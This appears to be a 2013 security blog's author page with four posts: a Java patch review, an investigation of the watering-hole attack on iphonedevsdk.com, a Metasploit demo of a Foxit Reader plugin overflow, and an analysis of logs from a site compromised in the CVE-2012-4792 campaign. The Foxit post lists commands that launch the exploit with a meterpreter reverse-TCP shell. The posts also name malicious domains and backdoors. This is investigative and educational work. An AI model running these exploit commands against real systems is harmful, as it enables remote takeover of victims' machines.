All posts by wow

Oracle Java Critical Patch Update February 2013 – Special Update Review

20/02/2013Vulnerability ManagementCVE-2013-0169, CVE-2013-1484, CVE-2013-1485, CVE-2013-1486, CVE-2013-1487, Oracle, Oracle Java Critical Patch Update, Oracle Java Critical Patch Update February 2013wow

Oracle has provide a Java Critical Patch Update (CPU) Special Update for February 2013 how has been released on Tuesday, February 19. On the 5 security vulnerabilities, fixed in this CPU, all of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 3 vulnerabilities have a CVSS base score upper or equal to 7.0.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

JDK and JRE 7 Update 13 and earlier
JDK and JRE 6 Update 39 and earlier
JDK and JRE 5.0 Update 39 and earlier
SDK and JRE 1.4.2_41 and earlier

CVE-2013-1487, CVE-2013-1486 and CVE-2013-1484 have a CVSS base score of 10.0.

CVE-2013-1485 has a CVSS base score of 5.0.

CVE-2013-0169 has a CVSS base score of 4.3.

Facebook, Apple & Twitter Watering Hole Attack Additional Informations

20/02/2013VariousApple, CVE-2013-0422, Facebook, iphonedevsdk.com, Java 0day, Jsbug, min.liveanalytics.org, Oracle, Oracle Critical Patch Update January 2013, Oracle Java 0day, Oracle Java Critical Patch Update February 2013, Twitter, Xprotectwow

Update: Some worrying information’s at the bottom of the post.

As reported by Ars Technica, the 15th February, Facebook was victim of a watering hole attack, involving a “popular mobile developer Web forum“. The attack was using a Java 0day that has been urgently patched, in Oracle Java CPU of first February, by version 7 update 11 and version 6 update 39.

Ars Technica also pointed that the attack had occur during the same timeframe as the hack that exposed cryptographically hashed passwords at Twitter. Also Twitter was encouraging, the first February, users to disable Java in their browsers. 250 000 user accounts was compromised during the Twitter breach.

Four days after the news on Facebook, the 19 February, Reuters also mentioned Apple as a victim of the Oracle Java 0day. The same “popular mobile developer Web forum” was mentioned, but with the precision that this website is a “popular iPhone mobile developer Web forum”. People briefed on the case said that hundreds of companies were affected by this Java 0day, including defense contractors.

Another interesting fact is that Apple had blacklist Java Web plug-in, a second time in a month, the 31 January, through an update to Xprotect, the Mac OS X “anti-malware” system. Surely a reaction the breach reported in the press 19 days later.

Today, Ars Technica released the name of the “popular iPhone mobile developer Web forum”, aka www.iphonedevsdk.com. Now we can gather some information’s related to this watering hole attack.

On urlQuery we can find an interesting submission, the 23 January, who reveal that some Java code was involved during the visit of the web site.

On JSUNPACK we can find another interesting submission, the 22 January, related to the www.iphonedevsdk.com. This submission reveals another website who is min.liveanalytics.org with URL “min.liveanalytics.org/cache.js?1358893681579“. The “cache.js” JavaScript was no more present at this date.

liveanalytics.org domain name was created the 8 ~~December~~ October 2012, through Public Domain Registry registrar. All contact information’s are hidden behind PrivacyProtect.org. Privacy Protection ensures that private information of domain owners are not published by replacing all the publicly visible contact details with alternate contact information.

But going back on the first urlQuery submission, we can see that www.iphonedevsdk.com website was doing three requests to min.liveanalytics.org website.

First call was to “/cache.js?1358897354865” JavaScript with a date of “Tue, 22 Jan 2013 23:21:31 GMT“. “1358897354865” return the number of milliseconds since 1970/01/01.

Second call was to “/jquery.js?ummrznjf” JavaScript with the same date.

Third call was to “empty.htm” with additional parameters who are “empty.htm?id=0&ts=X&n=fp&s=Y“. In the following screenshot you will se that X value of ts variable return the number of milliseconds since 1970/01/01. Also in the following screenshot you will see a base64-encoded string:

eyJicm93c2VyIjoiRmlyZWZveCIsInVhIjoiTW96aWxsYSU1Qy81LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTNCJTIwcnYlM0ExLjkuMi4xMyUyOSUyMEdlY2tvJTVDLzIwMTAxMjAzJTIwRmlyZWZveCU1Qy8zLjYuMTMiLCJwcm9kdWN0IjoiR2Vja28iLCJwbHVnaW5zIjp7Ik1vemlsbGElMjBEZWZhdWx0JTIwUGx1Zy1pbiI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxLjAuMC4xNSJ9LCJTaG9ja3dhdmUlMjBGbGFzaCI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxMC4wLjQ1LjIifSwiSmF2YSUyOFRNJTI5JTIwUGxhdGZvcm0lMjBTRSUyMDYlMjBVMjYiOnsiaW5zdGFsbGVkIjp0cnVlLCJ2ZXJzaW9uIjoiNi4wLjI2MC4zIn0sIkphdmElMjBEZXBsb3ltZW50JTIwVG9vbGtpdCUyMDYuMC4yNjAuMyI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiI2LjAuMjYwLjMifSwiQWRvYmUlMjBBY3JvYmF0Ijp7Imluc3RhbGxlZCI6dHJ1ZSwidmVyc2lvbiI6IjguMC4wLjQ1NiJ9LCJNaWNyb3NvZnQlQUUlMjBEUk0iOnsiaW5zdGFsbGVkIjp0cnVlLCJ2ZXJzaW9uIjoiOS4wLjAuNDUwMyJ9LCJXaW5kb3dzJTIwTWVkaWElMjBQbGF5ZXIlMjBQbHVnLWluJTIwRHluYW1pYyUyMExpbmslMjBMaWJyYXJ5Ijp7Imluc3RhbGxlZCI6dHJ1ZSwidmVyc2lvbiI6IjMuMC4yLjYyOSJ9LCJhY3JvYmF0Ijp7Imluc3RhbGxlZCI6ZmFsc2UsInZlcnNpb24iOm51bGx9LCJmbGFzaCI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxMC4wLjQ1LjIifSwic2hvY2t3YXZlIjp7Imluc3RhbGxlZCI6ZmFsc2UsInZlcnNpb24iOm51bGx9LCJTaWx2ZXJsaWdodCUyMFBsdWctSW4iOnsiaW5zdGFsbGVkIjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sIndtcCI6eyJpbnN0YWxsZWQiOmZhbHNlLCJ2ZXJzaW9uIjpudWxsfSwicmVhbCI6eyJpbnN0YWxsZWQiOmZhbHNlLCJ2ZXJzaW9uIjpudWxsfSwiamF2YSI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxLjYuMF8yNiJ9fX0=

Decoded this value is quiet interesting:

{"browser":"Firefox","ua":"Mozilla%5C/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko%5C/20101203%20Firefox%5C/3.6.13","product":"Gecko","plugins":{"Mozilla%20Default%20Plug-in":{"installed":true,"version":"1.0.0.15"},"Shockwave%20Flash":{"installed":true,"version":"10.0.45.2"},"Java%28TM%29%20Platform%20SE%206%20U26":{"installed":true,"version":"6.0.260.3"},"Java%20Deployment%20Toolkit%206.0.260.3":{"installed":true,"version":"6.0.260.3"},"Adobe%20Acrobat":{"installed":true,"version":"8.0.0.456"},"Microsoft%AE%20DRM":{"installed":true,"version":"9.0.0.4503"},"Windows%20Media%20Player%20Plug-in%20Dynamic%20Link%20Library":{"installed":true,"version":"3.0.2.629"},"acrobat":{"installed":false,"version":null},"flash":{"installed":true,"version":"10.0.45.2"},"shockwave":{"installed":false,"version":null},"Silverlight%20Plug-In":{"installed":false,"version":null},"wmp":{"installed":false,"version":null},"real":{"installed":false,"version":null},"java":{"installed":true,"version":"1.6.0_26"}}}

These kinds of behaviors make me think to a statistic backend like Jsbug, but I don’t have enough information’s to validate my doubts.

By doing some additional researches on urlQuery, regarding min.liveanalytics.org, we can find a submission dating from the 23 January with one screenshot. And by doing also additional researches on urlQuery, regarding www.iphonedevsdk.com, we can observe that min.liveanalytics.org was down the 24 January.

Now let try other occurrences for www.iphonedevsdk.com or min.liveanalytics.org in search engines & search engines caches. No luck, Google and his cache are not revealing any information’s, same for Bing and other popular search engines. But WayBack Machine is providing a cached version of www.iphonedevsdk.com for the 15 January, and, and you got it Google Chrome is presenting a nice warning screen regarding min.liveanalytics.org 😉

It is confirming us that this website was hosting some malware and that www.iphonedevsdk.com was including JavaScript calls to min.liveanalytics.org the 15 January, date of the Wayback Machine capture. If you take a look at the source code of cached version of www.iphonedevsdk.com you can see this, a nice JavaScript inclusion.

So we have a timeline associated with this domain:

Domain name was registered the 8 ~~December~~ October with hidden information’s
WayBack Machine cached version of 7 December is not infected.
WayBack Machine report us that the website was infected the 15 January
urlQuery & JSUNPACK report us that the website was up the 22/23 January
urlQuery report us that the website was down the 24 January

Another interesting timeline is the Oracle Java patch and life cycle:

11 December 2012: Oracle release, through a CPU, Java SE 7 Update 10 who introduced the levels of security for applet execution.
13 January 2013: Oracle release an alert and update, Java SE 7 Update 11, for a Java 0day able to bypass the security manager.
1 February 2013: Oracle release, through an out-of-band CPU, Java SE 7 Update 13, in order to fix a 0day exploited in the wild.

As you can see, Java SE 7 Update 10, released the 11 December, has introduce the levels of security (“Medium” by default) and bunch of pop-ups, who are warning you about the trust of an applet. Java SE 7 Update 11, released the 13 January, has force the level of security from “Medium” to “High“. With the “High” setting, the user is always prompted before any unsigned Java applet or Java Web Start application is run.

What I can suppose regarding these timelines:

First, the victims of this watering hole campaign didn’t have potentially updated to the latest version.
Second, the victims of this watering hole campaign did have potentially update to JSE 7U11, but have not change the default security level from “Medium” to “High“, despite all the history in Java 0days and advises of security experts.
Third, the victims, have potentially detect the attack when JSE 7U13 was out, because the “High” security level shown them some unusual applet execution on the “popular iPhone mobile developer Web forum”.

Was this campaign a highly targeted attack? I don’t think so, why because Oracle Java has a long history of 0days, and serious companies like Twitter, Facebook and Apple should have disable Java Web Start application for non trusted applets since a while.

Updates

F-Secure has provide in a blog post 2 other domain names involved in the Facebook, Apple and Twitter compromise, this domain name are:

cloudbox-storage.com
digitalinsight-ltd.com

By investigating on these domain names, I found some worrying information’s. If these information’s are confirmed then the story is complete different and could have a bigger impact.

“digitalinsight-ltd.com” domain name was registered the 2012-03-22. By doing some Google dorks we can find these informations:

A post on Fedoraforum.org, dating from 2012-07-14 mentioning this domain name… and a user of the forum wonder why a JavaScript inclusion is done to this domain.

If you take a look on Wayback Machine, you can find a cached version from 2012-07-12, that makes your Google Chrome screaming….

And what can we find in the source code of the FedoraForum webpage!!!!! A similar JavaScript inclusion as for www.iphonedevsdk.com also calling a “cache.js” script….

We can also found a JSUNPACK submission, dating from 2012-10-22 with same source code….

And we can find some French guys complaining on a forum regarding a JavaScript inclusion to the same domain and script…. the 2012-09-29

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

18/02/2013Exploits, MetasploitFoxit, Foxit Reader, OSVDB-89030wow

Timeline :

Vulnerability discovered by rgod the 2013-01-07
Vendor public release of the vulnerability the 2013-01-14
Metasploit PoC provided the 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Integral SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a vulnerability in the Foxit Reader Plugin, it exists in the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts, overly long query strings within URLs can cause a stack-based buffer overflow, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter

18/02/2013VariousCVE-2012-4792, Internet Explorer, Internet Explorer 0day, watering hole attackswow

This post is a small part of an in-depth analysis of the watering hole campaign of December involving an Internet Explorer 0day. Jindrich Kubec and my self are working hard in order to synthesize all these information’s in order to provide you a high level overview.

As I mentioned to threatpost.com, the 14th January, additional web sites were discovered hosting Internet Explorer CVE-2012-4792 exploit. One of the additional web site was “All Jap auto parts” (www.alljap.net), an importer of second-hand japanese engines and car parts located in Brisbane, Queensland, Australia.

StopMalvertising published an analysis I recommend to you for additional information’s.

When I discovered this infected web, I noticed initially that the files were time stamped (HTTP Last-Modified entity-header) at the following dates:

deployJava.js : Fri, 14 Dec 2012 15:47:42 GMT
index.html : Fri, 14 Dec 2012 15:49:58 GMT
news.html : Fri, 14 Dec 2012 15:50:42 GMT
robots.txt : Fri, 14 Dec 2012 15:50:57 GMT
today.swf : Fri, 14 Dec 2012 15:51:08 GMT
xsainfo.jpg : Fri, 14 Dec 2012 15:56:44 GMT

“index.html” file was supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw), japanese (ja), american english (en-us) and russian (ru). “girl” and “boy” patterns were present. And “hello” text was hidden.

CFR.org version of “index.html”, I discovered in Google cache and dating from the 7 December, was only supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw) and american english (en-us). “girl” and “boy” patterns were also present and “hello” text was not hidden.

CFR.org version, reported by FireEye, of around the 20 December, was supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw), japanese (ja), american english (en-us), russian (ru) and korean (ko). “girl” and “boy” patterns were no more present and replace by “ms-help:” technique to bypass ASLR on Windows 7. Also “hello” text was hidden.

By only analyzing these samples, from CFR.org and All jap auto part, we can observe that the attackers have changed tactics multiple times during this campaign.

By analyzing all the samples of other infected web sites (around 40 infected web sites samples), I observed that the All jap auto part was not used in the watering hole campaign. No high value legit websites where including, by iframe or by JavaScript inclusion, this website.

By doing some further analysis, regarding All jap auto part, I observed initially that hosted phpmyfaq and wwwboard tools were not updated since a long time. And after some Google dorks, I found two PHP backdoors and the Apache logs (from 13 November to beginning February) who were freely accessible from Internet. We will name the first backdoor BK1 and the second BK2 for further references in this blog post.

Having free access to the logs, was an unique opportunity to find additional evidences, regarding the attackers and the differences in the samples and patterns.

I first researched, in the logs, accesses to the backdoors. BK1 was not present in the logs, but BK2 was accessed the 7 December by IP 112.175.234.199. The IP is located in South Korea and is associated to FlyVPN.com VPN mirror. User agent associated to this IP is Internet Explorer 8 under Windows XP.

112.175.234.199 – – [07/Dec/2012 00:31:22 +0000] “GET /BK2.php HTTP/1.1” 200 371 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)”

By searching additional references to this IP, we can observe a first access to CVE-2012-4792 exploit the 7 December with a different user agent, Firefox 12 under Windows XP.

112.175.234.199 – – [07/Dec/2012 01:18:59 +0000] “GET /wwwboard/news/index.html HTTP/1.1” 200 5776 “http://www.gbn.com/” “Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0”

We can directly observe that the HTTP referer was Global Business Network (www.gbn.com) and that All jap auto part was also involved in a watering hole campaign. Description of GBN:

GBN helps organizations adapt and grow in an increasingly uncertain and volatile world. Using our leading-edge tools and expertise—scenario planning, experiential learning, networks of experts and visionaries—we enable our clients to address their most critical challenges and gain the insight, confidence, and capabilities they need to shape the future.

We can also confirm, like CFR.org, that the exploit was present on All jap auto part since minimum the 7 December.

By doing a complete log analysis we can observe the following time line and information’s.

Alljap - 112.175.234.199 - South Korea IP Activities

Dates	User Agents	Actions
07/Dec/2012 00:31:22	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access to BK2
07/Dec/2012 00:31:25 to 00:32:47	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
07/Dec/2012 00:32:58	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Modify mail.php through BK2
07/Dec/2012 00:33:10	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Modify tw.htm through BK2
07/Dec/2012 00:33:24 to 00:40:05	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
07/Dec/2012 01:18:59	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Test 0day through GBN.com
07/Dec/2012 17:55:15	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Test 0day through GBN.com

This IP has directly access to BK2, no other web pages visits. You can observe that some PHP mail code (mail.php) was put in place in order to send spear phishing email targeted to Taiwanese people’s (tw.htm). Bunch of operations have been done through BK2. Also you can observe that they test the exploit with Firefox 12.

Alljap - 113.30.106.94 - South Korea IP Activities

Dates	User Agents	Actions
10/Dec/2012 08:15:34	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Check presence of 0day
10/Dec/2012 08:15:56 to 08:19:00	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
10/Dec/2012 08:19:25	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access to demo.txt (demo~) file
10/Dec/2012 08:19:34	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Test 0day
10/Dec/2012 08:20:13 to 08:22:11	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
10/Dec/2012 08:27:30 to 08:29:54	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Test 0day through GBN.com

This IP has directly access to BK2, no other web pages visits, and manipulate the content of CVE-2012-4792 0day. The IP is located in South Korea with only a pptp VPN open port. You can also observe usage of a file named “demo.txt”.

Alljap - 59.124.14.102 - Taiwan IP Activities

Dates	User Agents	Actions
10/Dec/2012 08:42:34	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access to BK2
10/Dec/2012 08:42:38 to 08:44:00	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
10/Dec/2012 08:54:36 to 08:54:49	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Test 0day through GBN.com
10/Dec/2012 09:09:52 to 09:09:57	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
10/Dec/2012 09:11:08 to 09:11:55	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access 0day files
10/Dec/2012 09:12:14 to 09:13:18	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Test presence of deployJava.js
10/Dec/2012 09:13:41 to 09:15:36	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2
10/Dec/2012 09:23:10 to 09:28:11	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day and do some test from GBN.com. The IP is located in Taiwan with only a pptp VPN open port.

Alljap - 112.213.97.39 - Hong-Kong IP Activities

Dates	User Agents	Actions
14/Dec/2012 15:44:40	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access to BK2
14/Dec/2012 15:44:47 to 15:49:58	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day. The IP is located in Hong-Kong with only a pptp VPN open port.

Alljap - 113.30.106.92 - South Korea IP Activities

Dates	User Agents	Actions
14/Dec/2012 15:50:42	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access to BK2
14/Dec/2012 15:50:57 to 15:52:57	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day. The IP is located in South Korea with only a pptp VPN open port.

Alljap - 110.4.82.38 - South Korea IP Activities

Dates	User Agents	Actions
14/Dec/2012 15:54:14	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Check presence of demo.txt file
14/Dec/2012 15:55:04	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Access to BK2
14/Dec/2012 15:56:44	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)	Operation through BK2
14/Dec/2012 16:02:19 to 16:03:56	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Test 0day through GBN.com
16/Dec/2012 12:08:45	Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0	Test 0day through GBN.com

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day and do some test from GBN.com. The IP is located in South Korea.

As you can see the attackers have use massively VPN connexions in order to connect themselves to BK2. If you compare the “Last-Modified” HTTP headers of the samples, you can see that they are corresponding to the last three different IPs manipulations.

As we have the complete Apache logs, I was also able to analyze the attack surface of the watering hole campaign through GBN.

My first analysis was to see all successful hits to “index.html” file from 7 December to 17 December, without any segregation. By clicking on the following link you will access to a Google Fusion Table providing all associated information’s.

You can find also the TOP 10 of countries how have hit the exploit.

Alljap - All Hits TOP 10 Countries

Country	Unique IP count
US	311
BR	77
CN	64
TR	44
GB	30
DE	25
CA	23
IN	19
FR	19
MX	18

My second analysis was to see all potential successful exploitation targeting “MSIE 8.0“, from 7 December to 17 December. By clicking on the following link you will access to a Google Fusion Table providing all associated information’s.